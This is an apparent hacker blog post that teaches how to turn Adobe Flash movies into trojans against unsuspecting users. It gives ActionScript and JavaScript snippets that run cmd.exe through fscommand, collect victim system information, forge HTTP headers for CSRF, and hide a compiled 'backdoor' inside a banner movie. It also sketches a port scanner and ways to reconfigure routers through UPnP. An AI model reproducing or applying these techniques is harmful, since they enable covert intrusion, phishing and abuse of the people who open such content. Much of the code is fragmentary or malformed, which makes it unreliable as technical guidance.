Hackers Dot NL

 

Hacking your way into a network usually depends on your skills as a social engineer and of technical ability. One of the most powerful techniques that requires extensive knowledge in both, is one of the oldest known to man: by using a Trojan Horse. Nearly every virusscanner will tick on malicious executables, like screensavers. Plus, it takes quite a stupid person to just click and execute such executables.

The power in the Trojan Horse trick is to let the users bring you inside their safe iron city, where you set off the attack while they sleep. Building native applications that execute code requires quite the works, rarely offer stealthy ways and are the worst to port. So, we want to gain access to the network, without getting detected before we reach our goal, and to as many hosts as we want. Difficult? No, of course not!

Web-browsers are no more like they used to be. Lynx has been replaced with Firefox and Opera and are able to use plugins and fancy speed dials. But the most important one here is that all come with Adobe Flash enabled… Yes, that’s right. It’s easy, it’s stealthy, it’s portable and it allows you to get right in

The sexiness of it lies within the fact that Flash, for one, is embeddable: you can put a piece of flash inside your candy styled HTML complaint page and send the victim your “URL”. There are basically two approaches you can take, either you create a 1 by 1 pixel SWF-object which you insert somewhere or make a visible object, like for example a movie player or game (which gets spread by the user if they like it, mwuhahahahaha).

Where is the power? Flash has this nitty witty internal language called ActionScript. Not designed for this purpose, thus perfect for hacking. Extra sexy is that the hack is completely independent of the browser, as long as it allows Flash movies, which makes it cross platform.

With the power of ActionScript it is perfectly possible to write data out to your database (or someone elses), gain access to the router and create a reverse backdoor, discover the internal network topology, communicate to the webbrowser, ActiveX controls and other applications.

In ActionScript, fscommand allows us to send a message to a scripting language like JavaScript, but you can do much worse things like: sending VB events with strings that can be handled in the programming language environment (VBA). Using the _DoFSCommand allows us to pass strings in JavaScript code in any way you like.

Within the embeddable page you could create a function in JavaScript like this:

function EvilMovie_DoFSCommand(command, params) {

 if (command == “myInstruction”) {

   alert(params);

 }

}

In the ActionScript you could control this function by: fscommand(“myInstruction”, “w00t… I am executing JavaScript functions..!”)

Did I mention you could do similar with PHP too? Or something sexy like this on Windows boxen:

fscommand(“exec”,”cmd.exe\t/C\techo\t” + myInstructions + “\t>>” + fName)

fscommand(“exec”,”cmd.exe\t/C\tattrib\t” + attributes + “\t” + fName);

As I mentioned before the web is the limit, as Flash is HTTP dependent when it comes to interacting. Danger, danger! Why? Because exactly this allows Flash to do calls in SOAP (Simple Object Access Protocol), which allows you to make Remote Procedure Calls over the HyperText Transfer Protocol (yup, thats HTTP). This means access to any Windows Server running IIS that supports ADO and ASP. This means access to Web Services that support SOAP. This means access to routers and printers using UPnP, thus fooling the NAT. Sexy isn’t it? Oh, and while we are at it… the cover of Rogue Edition was done in Flash as well (because I lack Photoshop skills and it doesn’t generate SWF’s like Flash does).

Some people write worms, I prefer the Hydra approach though. Especially Flash allows such attacking by simple dynamic loading of other “movies”. The ActionScript method allows us on-the-fly loading of our needed components, which makes the Hydra dynamic and modular. For example, you could like do a form of OS detection using JavaScript, like getting the Operating System version, browser version and so on by doing a workaround dirty callback function that does an even dirtier variable override (overwriting a data structure):

 

function EvilMovie_DoFSCommand(command, params)

{

 if (command == “getvictiminfo”)

 {

   var EvilMovie=getFlashMovieObject(“EvilMovie”);

   EvilMovie.SetVariable(“/:VictimData”,

   Any.JavaScript.CallableObjectData);

 }

}

The fscommand that calls it, again could determine on the variable VictimData to “load” a module by using the LoadMovie() method on the fly. Pretty powerful, if you ask me.

 

So, you know some browser information now and wooh00 the Operating System, but where is the hacking in that? Well, let’s take on something more ‘leet’ than. How about HTTP Header Injection to be used for Cross-site request forgery (CSRF)? Using Flash we are able to inject unauthorized code into a website, by throwing out HTTP requests while you keep the control over the HTTP headers, especially where the victim server uses Keep-Alive connections (default Apache configuration) and the Flash Movie runs from within Firefox 3, where you control every part of the header like METHOD, URI, VERSION, headers and it’s data. You could alter the crossdomain.xml to ensure the freedom of your Flash Movie, so it’s able to load data from the XML.load(_root.xmldata) function call. This allows to load resources across domains, thus an excellent way for MITM and phising attacks.

 

For you newbies out there, CSRF means that you hack a site by stealing an identity. You exploit the sites that rely on that identity’s trust and tricking the user’s browser into sending HTTP requests to a target site. If you are able to beat the race conditions, you could build a dynamic DDoS tool (did I mentioned Flash is a trusted application). With other words, this is an excellent way to hack Hotmail and phpBB forums

 

The skeleton for forging those fake headers is quite simple. All you need for this is a decent Actionscript compiler or IDE like Adobe Flash CS3 for example.

 

(* FakeHeaders.as *)

class FakeHeaders

{

 function FakeHeaders()

 {

  (* constructor *)

 }

 static function main(mc)

 {

  var req:LoadVars=new LoadVars();

  req.addRequestHeader(“Evil”,”MoreEvil”);

  req.decode(“a=b&c=d&e=f”);

  req.send(“http://127.0.0.1:1337/victim”,”",”POST”)

 }

}

The stealth of such applications is incredible when it comes to Anti-Virus, because Flash movies are seen as “trusted” web content. Even better is that the only user interaction you need is the victim to allow “Flash Movies” (which is default), and click on your link.

 

Besides HTTP data, Flash can dynamically load binary data. Using DNS rebinding, you can scan the internal network without having to worry too much about firewalls and Intrusion Detection Systems. The format of a Flash Movie is binary (SWF), which is created by Adobe Flash IDE or… tools like Mtasc! Mtasc is an ActionScript Open Source compiler which can be used to build quick and cool stuff, like backdoors.

 

A very simple example that does absolutely nothing than to call alert:

(* backdoor.as *)

class Backdoor

{

 function Backdoor()

 {

  (* constructor *)

 }

 static function main(mc)

 {

  getURL(“javascript:alert(‘I just sneaked in…’)”);

 }

}

You can compile this code by doing:

thex00@blackpearl:/secret/GordonProject$ mtasc -swf myWorm.swf -main backdoor.as

Add that code to another flash movie:

thex00@blackpearl:/secret/GordonProject$ swfcombine -o demo.swf -T myWorm.swf myBanner.swf

Now how about some local network scanning to ice the cake? The socket handling in ActionScript 3, allows you to scan TCP ports (Flash is not designed for usage with UDP), through the SecurityErrorEvent object.

This special object in flash is an exception, like you have in Java, that is ‘thrown’. The flaw in this design however that it is thrown immediately when a connection failed (closed ported), so if the Movie isn’t allowed AND doesn’t get a SecurityErrorEvent within seconds the port is likely to be open.

Here is an example of how such a scanner would look like:

/* (* ScannerSkeleton.as *) ActionScript 3 */

protected var host:String;

protected var port:Number;

protected var sock:Socket;

public class Main

{

 public function Main():void

 {

  conn = new LocalConnection();

  conn.allowDomain(‘*’);

  sock = new Socket();

  sock.addEventListener(SecurityErrorEvent.SECURITY_ERROR, onSecurityError);

  sock.connect(host, port)

 }

}

Not so great is the spawning of child processes inside the flashmovie, which can cause the movie to hang the browser or even worse, the Operating System. Because Flash allows you to scan inside the network, you should try to find the router, which by default uses the Telnet protocol but these days comes with a web interface. As I’ve mentioned before, it is perfectly possible to reconfigure the router from within Flash, or even worse… Enable UPnP!

 

Finally, some of the conditions that you need to meet when hacking with Flash. The advantage is that Flash data is stored locally, the challenge is that you got by default only 100Kb per host to work with (a lot less than that actually, its more like 4-5Kb that you can really use for your abusive motivations)… but it rarely gets deleted and doesn’t have an expiration date, so not like cookies.

Why hack with Flash? Because you can! Hope you enjoyed it. [print_link]